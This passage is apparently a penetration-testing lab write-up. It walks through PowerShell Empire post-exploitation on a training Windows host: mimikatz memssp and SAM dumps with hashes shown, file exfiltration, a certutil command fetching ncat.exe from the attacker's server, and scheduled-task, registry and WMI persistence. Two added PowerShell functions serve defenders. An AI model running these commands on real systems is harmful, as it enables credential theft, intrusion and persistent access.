 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

memssp installed, check C:\Windows\System32\mimisla.log for logon events.

Connecting to the shell on the host to view the mimilsa.log file. Note that the first attempt below uses the misspelled name from the module message (mimisla.log) and returns nothing; the second attempt, with the correct name, shows the captured logons.

(Empire: SANS560HighPrivBypassUAC) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 > cmd.exe /c "type c:\windows\system32\mimisla.log"
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 >

Looking at the agent.log file.

2021-11-20 19:13:16 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimisla.log"

2021-11-20 19:13:49 : 


2021-11-20 19:17:44 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimilsa.log"

2021-11-20 19:17:50 : 
[00000000:00d9afac] SEC560STUDENT\sec560        sec560
[00000000:00d9afd7] SEC560STUDENT\sec560        sec560
[00000000:010ced5a] SEC560STUDENT\sec560        sec560
[00000000:010ceec4] SEC560STUDENT\sec560        sec560
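
From the defender's side, this is the check I would pair with the memssp step. It is an added example, not code from the original post or from Empire. It reports whether LSA runs as a protected process (RunAsPPL under HKLM:\SYSTEM\CurrentControlSet\Control\Lsa, which stops unsigned code from being injected into lsass.exe), lists any Security Support Packages registered to load at boot that are not in a list of names I assume for a typical Windows 10 build, and looks for the mimilsa.log file the module writes to. The file path is the one shown above; the expected-SSP list is my assumption.

```powershell
# Added example (not part of the original post or of Empire): a defender-side check
# for the conditions the memssp step depends on.
#  - RunAsPPL under HKLM:\SYSTEM\CurrentControlSet\Control\Lsa: when set, LSA runs as a
#    protected process and unsigned code cannot be injected into lsass.exe.
#  - The "Security Packages" lists name SSP DLLs loaded at boot; an on-disk SSP shows
#    up here as an unfamiliar entry (memssp itself is in-memory only and does not).
#  - mimilsa.log is the file memssp writes captured logons to, as seen above.
# The list of expected SSP names is an assumption for a typical Windows 10 build.
function Test-LsaSspExposure {
    [CmdletBinding()]
    param(
        [string]$MemsspLog = "$env:SystemRoot\System32\mimilsa.log"
    )
    $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lsa = Get-ItemProperty -LiteralPath $lsaPath

    # 1 = enabled with UEFI lock, 2 = enabled without; missing or 0 = not protected.
    $runAsPpl = if ($null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }

    $packages = @($lsa.'Security Packages')
    $osConfig = Get-ItemProperty -LiteralPath "$lsaPath\OSConfig" -ErrorAction SilentlyContinue
    if ($osConfig) { $packages += @($osConfig.'Security Packages') }
    $expected = 'kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap', 'negoexts'
    $unexpected = @($packages |
        Where-Object { $_ -and ($expected -notcontains $_.ToString().ToLower()) } |
        Sort-Object -Unique)

    $logPresent = Test-Path -LiteralPath $MemsspLog
    $logEntries = 0
    if ($logPresent) {
        $logEntries = @(Get-Content -LiteralPath $MemsspLog -ErrorAction SilentlyContinue).Count
    }

    [pscustomobject]@{
        LsaProtectionEnabled = ($runAsPpl -ge 1)
        RunAsPPL             = $runAsPpl
        UnexpectedSsps       = $unexpected
        MemsspLogPresent     = $logPresent
        MemsspLogEntries     = $logEntries
    }
}

# Usage (elevated prompt):
# Test-LsaSspExposure | Format-List
```

On a host where LsaProtectionEnabled is False the injection above works as shown; with it True, mimikatz cannot open lsass for injection without a signed driver, which is why RunAsPPL (or Credential Guard) is the mitigation to push for rather than hunting for the log file after the fact.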

Grabbing the Security Accounts Manager (SAM) Database.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/credentials/mimikatz/sam
[*] Set Agent to SANS560HighPrivBypassUAC

┌Record Options────────────────────┬──────────┬─────────────────────────┐
│ Name  │ Value                    │ Required │ Description             │
├───────┼──────────────────────────┼──────────┼─────────────────────────┤
│ Agent │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on. │
└───────┴──────────────────────────┴──────────┴─────────────────────────┘

(Empire: usemodule/powershell/credentials/mimikatz/sam) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 6

As always, reviewing the agent.log.

2021-11-20 19:22:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz SAM dump

2021-11-20 19:23:04 : 
Job started: VTZ9NY

2021-11-20 19:24:05 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

584     {0;000003e7} 1 D 42955          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : {0;000003e7} 1 D 17857121    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : SEC560STUDENT
SysKey : e2a5379f049ff5f37e322618f569e020
Local SID : S-1-5-21-2977773840-2930198165-1551093962

SAMKey : e40f50ec79bc899e9e73681cc1f1ef10

RID  : 000001f4 (500)
User : Administrator

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 9679f78eec859fdedb8c208c8fcf4abf

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 118e9239b1e3131c604aed931a6483ce

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC504STUDENTWDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 4ad74d67e523c7f6715edb2d899c236f6d1e315470fe74249262b923ab006874
      aes128_hmac       (4096) : a2f2ec30564c95960931d0480acb9220
      des_cbc_md5       (4096) : 46a82389e0649e1c

...

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC560STUDENTnotadmin
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7b462c5e57de3a5fae465b5288b3cafd4550b99e179cf5c31f51cac45d42c0e3
      aes128_hmac       (4096) : 08926d92cb36e12aeabdf81cdc238131
      des_cbc_md5       (4096) : fd1a079dd0b94cbc

...

mimikatz(powershell) # token::revert
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : no token

Grabbing credentials with Rubeus.

2021-11-20 19:30:53 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Rubeus

2021-11-20 19:31:07 : 
Administrator:500:24d666dff420a669de4afb2f96b214dd:372c5f8eb6a2e4b07caa7a4d5d7bcf30:::
Guest:501:edb8bd2a41d54ed296c4a6ca3e9ec80f:882b4fb7507002487e96831d1297822f:::
DefaultAccount:503:e455c45a5adc07078973696d3f86c447:2545ae7899dec24956cc2a248e974601:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9679f78eec859fdedb8c208c8fcf4abf:::
sec560:1202:aad3b435b51404eeaad3b435b51404ee:7abdbb1631d1674637aa354c4b4dd273:::
notadmin:1203:aad3b435b51404eeaad3b435b51404ee:c62638b38308e651b21a0f2ccab3ac9b:::
clark:1210:aad3b435b51404eeaad3b435b51404ee:594bb6d6d86a285ea1c8b04fd1f306e9:::
john:1211:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Now that we have credentials, time to move on.

6. Capturing packets

Time to capture some packets on the host, so that they can be analyzed later to see what is going on there. The packet_capture module drives netsh trace, which writes a circular ETL file (plus a .cab of troubleshooting data on stop) rather than a pcap; the "Trace configuration" output below is netsh's.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/collection/packet_capture
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/collection/packet_capture) > set MaxSize 1MB
[*] Set MaxSize to 1MB

(Empire: usemodule/powershell/collection/packet_capture) > set TraceFile c:\\tmp\\capture.etl
[*] Set TraceFile to c:\tmp\capture.etl

(Empire: usemodule/powershell/collection/packet_capture) > options

┌Record Options─────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name       │ Value                    │ Required │ Description                         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent      │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on.             │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ MaxSize    │ 1MB                      │ True     │ Maximum size of capture file. Blank │
│            │                          │          │ for no limit.                       │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Persistent │                          │ False    │ Switch. Persist capture across      │
│            │                          │          │ reboots.                            │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ StopTrace  │                          │ False    │ Switch. Stop trace capture.         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ TraceFile  │ c:\tmp\capture.etl      │ True     │ File to log the capture out to.     │
└────────────┴──────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 9

Looking at the agent.log

2021-11-20 19:45:10 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-PacketCapture

2021-11-20 19:45:16 : 

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         C:\tmp\capture.etl
Append:             Off
Circular:           On
Max Size:           1 MB
Report:             Off

Stopping the trace.

(Empire: usemodule/powershell/collection/packet_capture) > set StopTrace True
[*] Set StopTrace to True
(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 17

Looking at the agent.log.

2021-11-20 21:06:05 : 
Merging traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "c:\tmp\capture.cab".
File location = c:\tmp\capture.etl
Tracing session was successfully stopped.


7. Downloading contents - Exfiltration

Using the download command. First, switching back to the agent from the module menu.

(Empire: usemodule/powershell/collection/packet_capture) > interact SANS560HighPrivBypassUAC
[*] Task 12 results received
(Empire: SANS560HighPrivBypassUAC) >

Downloading all contents within the c:\tmp\ directory.

(Empire: SANS560HighPrivBypassUAC) > download c:\\tmp\\*.*
[*] Tasked SANS560HighPrivBypassUAC to run Task 18

The Powershell-Empire server console shows:

[+] Part of file build1.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file build2.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.cab from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.etl from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file launcher.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file MSBuild.exe from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file test.txt from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp

Looking at the agent.log ...

2021-11-20 21:12:02 : 
Tasked agent to download c:\tmp\*.*

2021-11-20 21:12:06 : 
file download: C:\tmp\build1.xml, part: 0

2021-11-20 21:13:07 : 
file download: C:\tmp\build2.xml, part: 0

2021-11-20 21:14:08 : 
file download: C:\tmp\capture.cab, part: 0

2021-11-20 21:15:12 : 
file download: C:\tmp\capture.etl, part: 0

2021-11-20 21:16:12 : 
file download: C:\tmp\launcher.xml, part: 0

2021-11-20 21:17:13 : 
file download: C:\tmp\MSBuild.exe, part: 0

2021-11-20 21:18:13 : 
file download: C:\tmp\test.txt, part: 0

2021-11-20 21:19:13 : 
[*] File download of C:\tmp\build1.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\build2.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.cab completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.etl completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\launcher.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\MSBuild.exe completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\test.txt completed

Confirming the files were successfully downloaded and are now stored on our attacking machine.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ls /var/lib/powershell-empire/downloads/8XW5324B/C\:/tmp/ -l
total 1720
-rw-r--r-- 1 root root     833 Nov 20 21:12 build1.xml
-rw-r--r-- 1 root root    3951 Nov 20 21:13 build2.xml
-rw-r--r-- 1 root root  432248 Nov 20 21:14 capture.cab
-rw-r--r-- 1 root root 1048576 Nov 20 21:15 capture.etl
-rw-r--r-- 1 root root    3941 Nov 20 21:16 launcher.xml
-rw-r--r-- 1 root root  261688 Nov 20 21:17 MSBuild.exe
-rw-r--r-- 1 root root      17 Nov 20 21:18 test.txt

There we go, with a successful exfiltration.

8. Uploading contents to the host.

I was having some problems with the upload module. Not sure what I was doing wrong. 

Looking at the help, this is what it shows.

(Empire: 8XW5324B) > upload --help
        Tasks an the specified agent to upload a file.

        Usage: upload <local_file_directory> [destination_file_name]

However, none of my activities generated a new task. For example, I tried the following 2 strategies:

(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe c:\\tmp\\ncat.exe
(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe 

None of the uploads I did generated a task, so I tried another method to get the file onto the file system. I guess whatever works is all that matters.

Hosted my file using Python SimpleHTTPServer:

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Dropping to the shell and executing certutil.

(Empire: 73H864SX) > shell
[*] Exit Shell Menu with Ctrl+C
(73H864SX)  > cmd.exe /c "certutil -URLCache -F http://10.0.0.107:80/ncat.exe ncat.exe"

Looking at the Python HTTP server, I see the file has been successfully downloaded.

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -

Reviewing the agent.log, I see.

2021-11-21 18:50:29 : 
tasked agent 73H864SX to run command certutil -URLCache -F http://10.0.0.107:80/ncat.exe c:\tmp\ncat.exe

2021-11-21 18:51:04 : 
****  Online  ****
CertUtil: -URLCache command completed successfully.
 

Running dir on the host to confirm the file was successfully downloaded.

(73H864SX)  > dir c:\tmp\ncat.exe
Mode   Owner               LastWriteTime           Length Name    
----   -----               -------------           ------ ----    
-a---- NT AUTHORITY\SYSTEM 11/21/2021 10:38:27 PM 1667584 ncat.exe

While I was unable to get the upload feature of Powershell Empire to work, I was still able to achieve my objective.
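
The certutil -URLCache -F download above is one of the better-known living-off-the-land patterns, and it is worth knowing how it looks in host telemetry. The following is an added example, not code from the original post or from Empire: it hunts Sysmon Event ID 1 (if Sysmon is installed under its default log name) and Security Event ID 4688 (which only carries the command line when the "Include command line in process creation events" policy is on) for certutil.exe invoked with urlcache, and reports the parent process. For the command above the parent would be cmd.exe, itself spawned by the powershell.exe hosting the agent. The look-back window is my assumption.

```powershell
# Added example (not part of the original post or of Empire): find certutil download
# activity in process-creation telemetry. Assumes Sysmon's default log name and/or
# command-line auditing enabled for Security 4688.
function Find-CertutilDownload {
    [CmdletBinding()]
    param(
        [datetime]$Since = (Get-Date).AddDays(-7)   # look-back window (assumption)
    )
    $pattern = '(?i)\burlcache\b'
    $hits = New-Object System.Collections.Generic.List[object]

    # Flatten the <EventData> section of an event record into a hashtable.
    function ConvertTo-EventData([System.Diagnostics.Eventing.Reader.EventRecord]$Record) {
        $data = @{}
        $xml = [xml]$Record.ToXml()
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        return $data
    }

    # 1. Sysmon Event ID 1: fields Image, CommandLine, ParentImage, User.
    $sysmon = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $Since
    } -ErrorAction SilentlyContinue
    foreach ($e in $sysmon) {
        $d = ConvertTo-EventData $e
        if ($d.Image -match '(?i)\\certutil\.exe$' -and $d.CommandLine -match $pattern) {
            $hits.Add([pscustomobject]@{
                Time = $e.TimeCreated; Source = 'Sysmon/1'; User = $d.User
                Parent = $d.ParentImage; CommandLine = $d.CommandLine })
        }
    }

    # 2. Security Event ID 4688: fields NewProcessName, CommandLine, SubjectUserName,
    #    ParentProcessName.
    $security = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4688; StartTime = $Since
    } -ErrorAction SilentlyContinue
    foreach ($e in $security) {
        $d = ConvertTo-EventData $e
        if ($d.NewProcessName -match '(?i)\\certutil\.exe$' -and $d.CommandLine -match $pattern) {
            $hits.Add([pscustomobject]@{
                Time = $e.TimeCreated; Source = 'Security/4688'
                User = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Parent = $d.ParentProcessName; CommandLine = $d.CommandLine })
        }
    }
    return $hits
}

# Usage (elevated prompt):
# Find-CertutilDownload -Since (Get-Date).AddDays(-1) | Format-Table -AutoSize -Wrap
```

The parent chain is the useful part of the result: certutil fetching a URL is occasionally legitimate, but certutil launched from cmd.exe under a powershell.exe that itself has a long-lived outbound HTTP connection is the shape of what this post just did.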


9. Persistence

For persistence, I like scheduled tasks, as they give you predictability in controlling how and when your malicious code can execute.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/schtasks
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True
[*] Set OnLogon to True

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set UserAgent Securitynik-Persistence-Schtasks-UserAgent
[*] Set UserAgent to Securitynik-Persistence-Schtasks-UserAgent

(Empire: usemodule/powershell/persistence/elevated/schtasks) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime        │ 09:00                               │ False    │ Daily time to trigger the script    │
│                  │                                     │          │ (HH:mm).                            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ IdleTime         │                                     │ False    │ User idle time (in minutes) to      │
│                  │                                     │          │ trigger script.                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OnLogon          │ True                                │ False    │ Switch. Trigger script on user      │
│                  │                                     │          │ logon.                              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:\Software\Microsoft\Network\de │ False    │ Registry location to store the      │
│                  │ bug                                 │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ TaskName         │ SecurityNik-Empire-Schtask          │ True     │ Name to use for the schtask.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ Securitynik-Persistence-Schtasks-   │ False    │ User-agent string to use for the    │
│                  │ UserAgent                           │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/schtasks) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 19

Looking at the agent.log.

2021-11-20 21:33:56 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Schtasks

2021-11-20 21:34:16 : 
SUCCESS: The scheduled task "SecurityNik-Empire-Schtask" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with SecurityNik-Empire-Schtask OnLogon trigger.

Leveraging the registry persistence.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/registry
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/registry) >  set UserAgent SecurityNik-Registry-Persistence
[*] Set UserAgent to SecurityNik-Registry-Persistence

(Empire: usemodule/powershell/persistence/elevated/registry) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/persistence/elevated/registry) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KeyName          │ Updater                             │ True     │ Key name for the run trigger.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:SOFTWARE\Microsoft\Windows\Cur │ False    │ Registry location to store the      │
│                  │ rentVersion\Debug                   │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-Registry-Persistence    │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/registry) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 21

Looking at the agent.log.

2021-11-20 21:51:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Registry

2021-11-20 21:52:18 : 
Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

Finally, persistence via WMI.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/wmi
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/wmi) >  set UserAgent SecurityNik-WMI-Persistence
[*] Set UserAgent to SecurityNik-WMI-Persistence

(Empire: usemodule/powershell/persistence/elevated/wmi) > set DailyTime 09:00
[*] Set DailyTime to 09:00

(Empire: usemodule/powershell/persistence/elevated/wmi) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/persistence/elevated/wmi) > options

┌Record Options─────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name        │ Value                       │ Required │ Description                         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent       │ SANS560HighPrivBypassUAC    │ True     │ Agent to run module on.             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ AtStartup   │ True                        │ False    │ Switch. Trigger script (within 5    │
│             │                             │          │ minutes) of system startup.         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup     │                             │ False    │ Switch. Cleanup the trigger and any │
│             │                             │          │ script from specified location.     │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime   │ 09:00                       │ False    │ Daily time to trigger the script    │
│             │                             │          │ (HH:mm).                            │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile     │                             │ False    │ Use an external file for the        │
│             │                             │          │ payload instead of a stager.        │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ FailedLogon │                             │ False    │ Trigger script with a failed logon  │
│             │                             │          │ attempt from a specified user       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener    │ http                        │ True     │ Listener to use.                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy       │ default                     │ False    │ Proxy to use for request (default,  │
│             │                             │          │ none, or other).                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds  │ default                     │ False    │ Proxy credentials                   │
│             │                             │          │ ([domain\]username:password) to use │
│             │                             │          │ for request (default, none, or      │
│             │                             │          │ other).                             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SubName     │ Updater                     │ True     │ Name to use for the event           │
│             │                             │          │ subscription.                       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent   │ SecurityNik-WMI-Persistence │ False    │ User-agent string to use for the    │
│             │                             │          │ staging request (default, none, or  │
│             │                             │          │ other).                             │
└─────────────┴─────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/wmi) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 22

Looking at the agent.log file.

2021-11-20 22:10:58 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-WMI

2021-11-20 22:11:20 : 
WMI persistence established using listener http WMI subscription daily trigger at 09:00.
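
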